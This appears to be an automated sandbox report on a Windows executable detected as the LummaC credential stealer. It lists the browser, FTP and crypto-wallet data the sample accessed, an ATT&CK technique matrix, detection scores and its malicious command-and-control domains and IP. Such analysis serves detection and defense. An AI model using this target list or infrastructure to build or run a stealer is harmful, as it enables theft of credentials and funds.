Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 3.2.Rgr8LJz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Rgr8LJz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rgr8LJz.exe.4089550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Rgr8LJz.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Rgr8LJz.exe	49%	Virustotal		Browse
Rgr8LJz.exe	47%	ReversingLabs	Win32.Trojan.Generic
Rgr8LJz.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cureprouderio.click/api:M	100%	Avira URL Cloud	malware
cureprouderio.click	100%	Avira URL Cloud	malware
robinsharez.shop	100%	Avira URL Cloud	malware
versersleep.shop	100%	Avira URL Cloud	malware
chipdonkeruz.shop	100%	Avira URL Cloud	malware
https://cureprouderio.click:443/apiefault-release/key4.dbPK	100%	Avira URL Cloud	malware
https://cureprouderio.click/buPs	100%	Avira URL Cloud	malware
femalsabler.shop	100%	Avira URL Cloud	malware
https://cureprouderio.click/api	100%	Avira URL Cloud	malware
https://cureprouderio.click:443/api	100%	Avira URL Cloud	malware
https://cureprouderio.click/apil	100%	Avira URL Cloud	malware
https://cureprouderio.click:443/apiL	100%	Avira URL Cloud	malware
soundtappysk.shop	100%	Avira URL Cloud	malware
https://cureprouderio.click/	100%	Avira URL Cloud	malware
https://cureprouderio.click:443/api4	100%	Avira URL Cloud	malware
crowdwarek.shop	100%	Avira URL Cloud	malware
https://cureprouderio.click:443/apin	100%	Avira URL Cloud	malware
https://cureprouderio.click/=s	100%	Avira URL Cloud	malware
handscreamny.shop	100%	Avira URL Cloud	malware
apporholis.shop	100%	Avira URL Cloud	malware
https://cureprouderio.click/pi	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cureprouderio.click	104.21.4.114	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cureprouderio.click	true	Avira URL Cloud: malware	unknown
robinsharez.shop	true	Avira URL Cloud: malware	unknown
versersleep.shop	true	Avira URL Cloud: malware	unknown
chipdonkeruz.shop	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/api	true	Avira URL Cloud: malware	unknown
femalsabler.shop	true	Avira URL Cloud: malware	unknown
soundtappysk.shop	true	Avira URL Cloud: malware	unknown
crowdwarek.shop	true	Avira URL Cloud: malware	unknown
apporholis.shop	true	Avira URL Cloud: malware	unknown
handscreamny.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cureprouderio.click/api:M	Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click:443/apiefault-release/key4.dbPK	Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/buPs	Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click:443/api	Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://cureprouderio.click:443/api4	Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/	Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/apil	Rgr8LJz.exe, 00000003.00000002.2890668054.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click:443/apin	Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click:443/apiL	Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/=s	Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cureprouderio.click/pi	Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.4.114	cureprouderio.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585913
Start date and time:	2025-01-08 13:57:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Rgr8LJz.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 36 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.190.160.14, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:57:55	API Interceptor	8x Sleep call for process: Rgr8LJz.exe modified
07:58:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.4.114	vbc.exe	Get hash	malicious	FormBook	Browse	www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cureprouderio.click	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer	Browse	172.67.132.7
	Patcher_I5cxa9AN.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	malw.hta	Get hash	malicious	Unknown	Browse	162.159.61.3
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.131.144
	http://www.hillviewlodge.hotelrent.top	Get hash	malicious	Unknown	Browse	104.18.86.42
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Q1 Statements.html	Get hash	malicious	Unknown	Browse	104.18.95.41
	174.exe	Get hash	malicious	Xmrig	Browse	104.21.95.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	asd.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	104.21.4.114
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	104.21.4.114
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	104.21.4.114
	socolo.exe	Get hash	malicious	LummaC	Browse	104.21.4.114

Dropped Files

⊘No context

Created / dropped Files

